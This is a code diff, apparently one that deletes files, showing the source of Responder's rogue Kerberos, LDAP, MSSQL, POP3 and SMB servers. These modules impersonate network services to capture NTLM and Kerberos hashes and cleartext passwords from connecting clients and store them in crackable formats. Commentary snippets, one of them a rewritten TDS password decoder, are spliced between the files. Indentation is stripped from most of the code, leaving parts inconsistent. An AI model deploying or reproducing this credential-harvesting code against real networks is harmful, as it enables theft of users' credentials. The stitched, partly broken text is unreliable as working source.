server1 = ThreadingTCPServer((settings.Config.Bind_To, 88), KerbTCP)
server2 = ThreadingUDPServer((settings.Config.Bind_To, 88), KerbUDP)
else:
server1 = ThreadingTCPServer(('', 88), KerbTCP)
server2 = ThreadingUDPServer(('', 88), KerbUDP)
for server in [server1, server2]:
t = threading.Thread(name='Kerberos', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting Kerberos server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def ParseMSKerbv5TCP(Data):
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[45:46])[0]
if HashLen == 53:
Hash = Data[48:99]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[147:148])[0]
Name = Data[148:148+NameLen]
DomainLen = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
Domain = Data[148+NameLen+4:148+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
return False
def ParseMSKerbv5UDP(Data):
MsgType = Data[17:18]
EncType = Data[39:40]
if MsgType == "\x0a" and EncType == "\x17":
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
Hash = Data[49:101]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[149:150])[0]
Name = Data[150:150+NameLen]
DomainLen = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
Domain = Data[150+NameLen+4:150+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
return False
class KerbTCP(BaseRequestHandler):
def handle(self):
try:
data = self.request.recv(1024)
KerbHash = ParseMSKerbv5TCP(data)
if KerbHash:
(n, krb, v, name, domain, d, h) = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except Exception:
raise
class KerbUDP(BaseRequestHandler):
def handle(self):
try:
data, soc = self.request
KerbHash = ParseMSKerbv5UDP(data)
if KerbHash:
(n, krb, v, name, domain, d, h) = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except Exception:
raise

View file

@ -1,167 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from traceback import print_exc
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge
from core.responder.utils import *
class LDAP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 389), LDAPServer)
else:
server = ThreadingTCPServer(('', 389), LDAPServer)
t = threading.Thread(name='LDAP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting LDAP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
def ParseSearch(data):
Search1 = re.search('(objectClass)', data)
Search2 = re.search('(?i)(objectClass0*.*supportedCapabilities)', data)
Search3 = re.search('(?i)(objectClass0*.*supportedSASLMechanisms)', data)
if Search1:
return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9]))
if Search2:
return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
if Search3:
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
def ParseLDAPHash(data, client):
SSPIStart = data[42:]
LMhashLen = struct.unpack('<H',data[54:56])[0]
if LMhashLen > 10:
LMhashOffset = struct.unpack('<H',data[58:60])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[64:66])[0]
NthashOffset = struct.unpack('<H',data[66:68])[0]
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[72:74])[0]
DomainOffset = struct.unpack('<H',data[74:76])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[80:82])[0]
UserOffset = struct.unpack('<H',data[82:84])[0]
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+settings.Config.NumChal
SaveToDb({
'module': 'LDAP',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+User,
'hash': NtHash,
'fullhash': WriteHash,
})
if LMhashLen < 2 and settings.Config.Verbose:
settings.Config.ResponderLogger.info("[LDAP] Ignoring anonymous NTLM authentication")
def ParseNTLM(data,client):
Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data)
Search2 = re.search('(NTLMSSP\x00\x03\x00\x00\x00)', data)
if Search1:
NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9],NTLMSSPNtServerChallenge=settings.Config.Challenge)
NTLMChall.calculate()
return str(NTLMChall)
if Search2:
ParseLDAPHash(data,client)
def ParseLDAPPacket(data, client):
if data[1:2] == '\x84':
PacketLen = struct.unpack('>i',data[2:6])[0]
MessageSequence = struct.unpack('<b',data[8:9])[0]
Operation = data[9:10]
sasl = data[20:21]
OperationHeadLen = struct.unpack('>i',data[11:15])[0]
LDAPVersion = struct.unpack('<b',data[17:18])[0]
if Operation == "\x60":
UserDomainLen = struct.unpack('<b',data[19:20])[0]
UserDomain = data[20:20+UserDomainLen]
AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
if AuthHeaderType == "\x80":
PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
SaveToDb({
'module': 'LDAP',
'type': 'Cleartext',
'client': client,
'user': UserDomain,
'cleartext': Password,
'fullhash': UserDomain+':'+Password,
})
if sasl == "\xA3":
Buffer = ParseNTLM(data,client)
return Buffer
elif Operation == "\x63":
Buffer = ParseSearch(data)
return Buffer
else:
if settings.Config.Verbose:
settings.Config.ResponderLogger.info('[LDAP] Operation not supported')
# LDAP Server class
class LDAPServer(BaseRequestHandler):
def handle(self):
try:
while True:
self.request.settimeout(0.5)
data = self.request.recv(8092)
Buffer = ParseLDAPPacket(data,self.client_address[0])
if Buffer:
self.request.send(Buffer)
except socket.timeout:
pass

View file

@ -1,186 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from traceback import print_exc
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
from core.responder.utils import *
class MSSQL:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 1433), MSSQLServer)
else:
server = ThreadingTCPServer(('', 1433), MSSQLServer)
t = threading.Thread(name='MSSQL', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting MSSQL server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class TDS_Login_Packet():
def __init__(self, data):
ClientNameOff = struct.unpack('<h', data[44:46])[0]
ClientNameLen = struct.unpack('<h', data[46:48])[0]
UserNameOff = struct.unpack('<h', data[48:50])[0]
UserNameLen = struct.unpack('<h', data[50:52])[0]
PasswordOff = struct.unpack('<h', data[52:54])[0]
PasswordLen = struct.unpack('<h', data[54:56])[0]
AppNameOff = struct.unpack('<h', data[56:58])[0]
AppNameLen = struct.unpack('<h', data[58:60])[0]
ServerNameOff = struct.unpack('<h', data[60:62])[0]
ServerNameLen = struct.unpack('<h', data[62:64])[0]
Unknown1Off = struct.unpack('<h', data[64:66])[0]
Unknown1Len = struct.unpack('<h', data[66:68])[0]
LibraryNameOff = struct.unpack('<h', data[68:70])[0]
LibraryNameLen = struct.unpack('<h', data[70:72])[0]
LocaleOff = struct.unpack('<h', data[72:74])[0]
LocaleLen = struct.unpack('<h', data[74:76])[0]
DatabaseNameOff = struct.unpack('<h', data[76:78])[0]
DatabaseNameLen = struct.unpack('<h', data[78:80])[0]
self.ClientName = data[8+ClientNameOff:8+ClientNameOff+ClientNameLen*2].replace('\x00', '')
self.UserName = data[8+UserNameOff:8+UserNameOff+UserNameLen*2].replace('\x00', '')
self.Password = data[8+PasswordOff:8+PasswordOff+PasswordLen*2].replace('\x00', '')
self.AppName = data[8+AppNameOff:8+AppNameOff+AppNameLen*2].replace('\x00', '')
self.ServerName = data[8+ServerNameOff:8+ServerNameOff+ServerNameLen*2].replace('\x00', '')
self.Unknown1 = data[8+Unknown1Off:8+Unknown1Off+Unknown1Len*2].replace('\x00', '')
self.LibraryName = data[8+LibraryNameOff:8+LibraryNameOff+LibraryNameLen*2].replace('\x00', '')
self.Locale = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
def ParseSQLHash(data, client):
SSPIStart = data[8:]
LMhashLen = struct.unpack('<H',data[20:22])[0]
LMhashOffset = struct.unpack('<H',data[24:26])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[30:32])[0]
NthashOffset = struct.unpack('<H',data[32:34])[0]
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[36:38])[0]
DomainOffset = struct.unpack('<H',data[40:42])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[44:46])[0]
UserOffset = struct.unpack('<H',data[48:50])[0]
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NtHash, settings.Config.NumChal)
SaveToDb({
'module': 'MSSQL',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+User,
'hash': LMHash+":"+NtHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NtHash[:32], NtHash[32:])
SaveToDb({
'module': 'MSSQL',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+User,
'hash': NtHash[:32]+":"+NtHash[32:],
'fullhash': WriteHash,
})
def ParseSqlClearTxtPwd(Pwd):
Pwd = map(ord,Pwd.replace('\xa5',''))
Pw = []
for x in Pwd:
Pw.append(hex(x ^ 0xa5)[::-1][:2].replace("x","0").decode('hex'))
return ''.join(Pw)
def ParseClearTextSQLPass(data, client):
TDS = TDS_Login_Packet(data)
SaveToDb({
'module': 'MSSQL',
'type': 'Cleartext',
'client': client,
'hostname': "%s (%s)" % (TDS.ServerName, TDS.DatabaseName),
'user': TDS.UserName,
'cleartext': ParseSqlClearTxtPwd(TDS.Password),
'fullhash': TDS.UserName +':'+ ParseSqlClearTxtPwd(TDS.Password),
})
# MSSQL Server class
class MSSQLServer(BaseRequestHandler):
def handle(self):
if settings.Config.Verbose:
settings.Config.ResponderLogger.info("[MSSQL] Received connection from %s" % self.client_address[0])
try:
while True:
data = self.request.recv(1024)
self.request.settimeout(0.1)
# Pre-Login Message
if data[0] == "\x12":
Buffer = str(MSSQLPreLoginAnswer())
self.request.send(Buffer)
data = self.request.recv(1024)
# NegoSSP
if data[0] == "\x10":
if re.search("NTLMSSP",data):
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=settings.Config.Challenge)
Packet.calculate()
Buffer = str(Packet)
self.request.send(Buffer)
data = self.request.recv(1024)
else:
ParseClearTextSQLPass(data,self.client_address[0])
# NegoSSP Auth
if data[0] == "\x11":
ParseSQLHash(data,self.client_address[0])
except socket.timeout:
pass
self.request.close()
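The XOR/nibble-swap trick in ParseSqlClearTxtPwd above can be written more explicitly; an equivalent standalone sketch:
def decode_tds_password(obfuscated):
    # TDS7 password de-obfuscation: drop the 0xA5 padding bytes, XOR each
    # remaining byte with 0xA5, then swap its high and low nibbles.
    out = []
    for ch in obfuscated.replace('\xa5', ''):
        b = ord(ch) ^ 0xA5
        out.append(chr(((b & 0x0F) << 4) | (b >> 4)))
    return ''.join(out)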

View file

@ -1,90 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import core.responder.settings as settings
import threading
from traceback import print_exc
from core.responder.utils import *
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import POPOKPacket
class POP3:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 110), POP3Server)
else:
server = ThreadingTCPServer(('', 110), POP3Server)
t = threading.Thread(name='POP3', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting POP3 server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# POP3 Server class
class POP3Server(BaseRequestHandler):
def SendPacketAndRead(self):
Packet = POPOKPacket()
self.request.send(str(Packet))
data = self.request.recv(1024)
return data
def handle(self):
try:
data = self.SendPacketAndRead()
if data[0:4] == "USER":
User = data[5:].replace("\r\n","")
data = self.SendPacketAndRead()
if data[0:4] == "PASS":
Pass = data[5:].replace("\r\n","")
SaveToDb({
'module': 'POP3',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User+":"+Pass,
})
data = self.SendPacketAndRead()
else:
data = self.SendPacketAndRead()
except Exception:
pass

View file

@ -1,433 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import core.responder.settings as settings
import threading
import socket
from random import randrange
from core.responder.packets import SMBHeader, SMBNegoAnsLM, SMBNegoAns, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.utils import *
class SMB:
def start(self):
try:
#if OsInterfaceIsSupported():
# server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
# server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
#else:
server1 = ThreadingTCPServer(('0.0.0.0', 445), SMB1)
server2 = ThreadingTCPServer(('0.0.0.0', 139), SMB1)
for server in [server1, server2]:
t = threading.Thread(name='SMB', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMB server: {}".format(e)
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# Detect if SMB auth was Anonymous
def Is_Anonymous(data):
SecBlobLen = struct.unpack('<H',data[51:53])[0]
if SecBlobLen < 260:
LMhashLen = struct.unpack('<H',data[89:91])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
if SecBlobLen > 260:
LMhashLen = struct.unpack('<H',data[93:95])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
def Is_LMNT_Anonymous(data):
LMhashLen = struct.unpack('<H',data[51:53])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
#Return the index (as a little-endian word) of the "NT LM 0.12" dialect offered in the Negotiate Protocol Request
def Parse_Nego_Dialect(data):
    packet = data
    try:
        Dialect = [e.replace('\x00', '') for e in data[40:].split('\x02')[:16]]
        for i, d in enumerate(Dialect):
            if d == "NT LM 0.12":
                return chr(i) + "\x00"
    except Exception:
        print 'Exception on Parse_Nego_Dialect! Packet hexdump:'
        print hexdump(packet)
#Set MID SMB Header field.
def midcalc(data):
pack=data[34:36]
return pack
#Set UID SMB Header field.
def uidcalc(data):
pack=data[32:34]
return pack
#Set PID SMB Header field.
def pidcalc(data):
pack=data[30:32]
return pack
#Set TID SMB Header field.
def tidcalc(data):
pack=data[28:30]
return pack
def ParseShare(data):
packet = data[:]
a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
if a:
settings.Config.ResponderLogger.info("[SMB] Requested Share : %s" % a.group(0).replace('\x00', ''))
#Parse SMB NTLMSSP v1/v2
def ParseSMBHash(data,client):
SecBlobLen = struct.unpack('<H',data[51:53])[0]
BccLen = struct.unpack('<H',data[61:63])[0]
if SecBlobLen < 260:
SSPIStart = data[75:]
LMhashLen = struct.unpack('<H',data[89:91])[0]
LMhashOffset = struct.unpack('<H',data[91:93])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[97:99])[0]
NthashOffset = struct.unpack('<H',data[99:101])[0]
else:
SSPIStart = data[79:]
LMhashLen = struct.unpack('<H',data[93:95])[0]
LMhashOffset = struct.unpack('<H',data[95:97])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[101:103])[0]
NthashOffset = struct.unpack('<H',data[103:105])[0]
if NthashLen == 24:
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[105:107])[0]
DomainOffset = struct.unpack('<H',data[107:109])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[113:115])[0]
UserOffset = struct.unpack('<H',data[115:117])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, settings.Config.NumChal)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[109:111])[0]
DomainOffset = struct.unpack('<H',data[111:113])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[117:119])[0]
UserOffset = struct.unpack('<H',data[119:121])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
# Parse SMB NTLMv1/v2
def ParseLMNTHash(data, client):
LMhashLen = struct.unpack('<H',data[51:53])[0]
NthashLen = struct.unpack('<H',data[53:55])[0]
Bcc = struct.unpack('<H',data[63:65])[0]
Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
if NthashLen > 25:
FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
LmHash = FullHash[:32].upper()
NtHash = FullHash[32:].upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, LmHash, NtHash)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
if NthashLen == 24:
NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
LmHash = data[65:65+LMhashLen].encode('hex').upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, settings.Config.NumChal)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
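For reference (added here for clarity, not in the original file): the fullhash strings built above follow the NETNTLM formats that common password crackers accept; for NTLMv2 that is user::domain:server_challenge:NT_proof:blob. A made-up example:

print '%s::%s:%s:%s:%s' % ('alice', 'CORP', '1122334455667788', 'A' * 32, 'B' * 64)
# -> alice::CORP:1122334455667788:AAAA...:BBBB...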
def IsNT4ClearTxt(data, client):
HeadLen = 36
if data[14:16] == "\x03\x80":
SmbData = data[HeadLen+14:]
WordCount = data[HeadLen]
ChainedCmdOffset = data[HeadLen+1]
if ChainedCmdOffset == "\x75":
PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
if PassLen > 2:
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
settings.Config.ResponderLogger.info("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
# SMB Server class, NTLMSSP
class SMB1(BaseRequestHandler):
def handle(self):
try:
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
if len(data) < 1:
break
##session request 139
if data[0] == "\x81":
Buffer = "\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
# Negotiate Protocol Response
if data[8:10] == "\x72\x00":
# \x72 == Negotiate Protocol Response
Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
# Session Setup AndX Request
if data[8:10] == "\x73\x00":
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(4096)
# STATUS_SUCCESS
if data[8:10] == "\x73\x00":
if Is_Anonymous(data):
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data,self.client_address[0])
# Send STATUS_SUCCESS
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = SMBSession2Accept()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
# Tree Connect AndX Request
if data[8:10] == "\x75\x00":
ParseShare(data)
# Tree Connect AndX Response
Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
Body = SMBTreeData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Tree Disconnect.
if data[8:10] == "\x71\x00":
